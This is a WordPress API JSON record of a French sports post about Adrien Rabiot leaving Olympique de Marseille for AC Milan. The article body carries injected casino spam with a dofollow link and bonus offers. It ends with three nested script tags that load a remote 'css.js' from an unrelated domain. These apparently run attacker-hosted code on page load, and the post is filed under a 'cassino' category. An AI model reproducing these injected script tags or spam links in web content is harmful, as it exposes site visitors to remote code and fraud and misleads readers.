{"id":4013,"date":"2025-11-20T03:57:19","date_gmt":"2025-11-20T03:57:19","guid":{"rendered":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/?p=4013"},"modified":"2026-02-02T22:10:12","modified_gmt":"2026-02-02T22:10:12","slug":"mercato-om-officiel-rabiot-quitte-lom","status":"publish","type":"post","link":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/2025\/11\/20\/mercato-om-officiel-rabiot-quitte-lom\/","title":{"rendered":"Mercato OM &#8211; officiel, Rabiot quitte l&#x27;OM"},"content":{"rendered":"<h1>Mercato OM &#8211; officiel, Rabiot quitte l&#x27;OM<\/h1>\n<h2>Un d\u00e9part annonc\u00e9, d\u00e9sormais officiel<\/h2>\n<p>Comme pressenti depuis plusieurs jours, <strong>Adrien Rabiot<\/strong> a mis fin \u00e0 son aventure \u00e0 l\u2019OM en rejoignant officiellement l\u2019AC Milan. Le contrat a \u00e9t\u00e9 enregistr\u00e9 aupr\u00e8s de la Lega juste avant la cl\u00f4ture du mercato. Le s\u00e9lectionneur Didier Deschamps avait lui-m\u00eame laiss\u00e9 entendre que le milieu ne rejoindrait le rassemblement tricolore qu\u2019apr\u00e8s avoir finalis\u00e9 son transfert.<\/p>\n<blockquote><p><strong><a href=\"https:\/\/jeu-casino-fr.com\/\" target=\"_blank\" rel=\"dofollow\">casino vert \u2013 ???? Rejoignez Casino Vert et Obtenez 100\u202f\u20ac de Bonus Offert pour les Nouveaux Joueurs !<\/a><\/strong> &#8211; jeu casino \ud83d\udcb0 Recevez un pack casino exceptionnel de 1300\u202fUSDT chez jeu casino : 300 offerts \u00e0 la connexion, 1000 au premier d\u00e9p\u00f4t.<\/p><\/blockquote>\n<h2>Un vestiaire marqu\u00e9 par les tensions<\/h2>\n<p>Le d\u00e9part du Fran\u00e7ais intervient deux semaines apr\u00e8s une altercation dans le vestiaire marseillais avec <strong>Jonathan Rowe<\/strong>, dans un contexte d\u00e9j\u00e0 pesant apr\u00e8s la d\u00e9faite face \u00e0 Rennes. Cette sc\u00e8ne avait acc\u00e9l\u00e9r\u00e9 une s\u00e9paration qui semblait in\u00e9vitable, l\u2019international n\u2019ayant pas trouv\u00e9 sa place dans un groupe olympien encore en construction.<\/p>\n<h2>Retour en Serie A pour relancer sa carri\u00e8re<\/h2>\n<p>Rabiot retrouve un championnat qu\u2019il conna\u00eet bien, lui qui a port\u00e9 le maillot de la Juventus entre 2019 et 2024. \u00c0 Milan, il s\u2019inscrit dans un projet ambitieux aux c\u00f4t\u00e9s de joueurs d\u2019exp\u00e9rience comme Luka Modri\u0107, avec l\u2019objectif de redresser une \u00e9quipe rossonera en difficult\u00e9. Un nouveau d\u00e9fi qui lui permettra de tourner rapidement la page de son passage \u00e0 Marseille.<\/p>\n<h2>Un rendez-vous d\u00e9j\u00e0 attendu face \u00e0 Bologne<\/h2>\n<p>Le calendrier offre un clin d\u2019\u0153il piquant : le 14 septembre, l\u2019AC Milan recevra Bologne, o\u00f9 \u00e9volue d\u00e9sormais Rowe. La rencontre entre les deux hommes sera scrut\u00e9e, symbole des tensions laiss\u00e9es derri\u00e8re \u00e0 l\u2019OM. Une affiche qui s\u2019annonce sous haute tension en Serie A.<\/p>\n<p><button class=\"button_button__AbnlE button_md__HB_Xg button_blue__rWPTN\">Retrouvez le tableau des transferts de l&#x27;OM ici<\/button><script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script><script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script><script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Mercato OM &#8211; officiel, Rabiot quitte l&#x27;OM Un d\u00e9part annonc\u00e9, d\u00e9sormais officiel Comme pressenti depuis plusieurs jours, Adrien Rabiot a mis fin \u00e0 son aventure \u00e0 l\u2019OM en rejoignant officiellement&#8230;<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[19],"tags":[],"class_list":{"0":"post-4013","1":"post","2":"type-post","3":"status-publish","4":"format-standard","6":"category-cassino"},"_links":{"self":[{"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/posts\/4013","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/comments?post=4013"}],"version-history":[{"count":4,"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/posts\/4013\/revisions"}],"predecessor-version":[{"id":14857,"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/posts\/4013\/revisions\/14857"}],"wp:attachment":[{"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/media?parent=4013"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/categories?post=4013"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/tags?post=4013"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}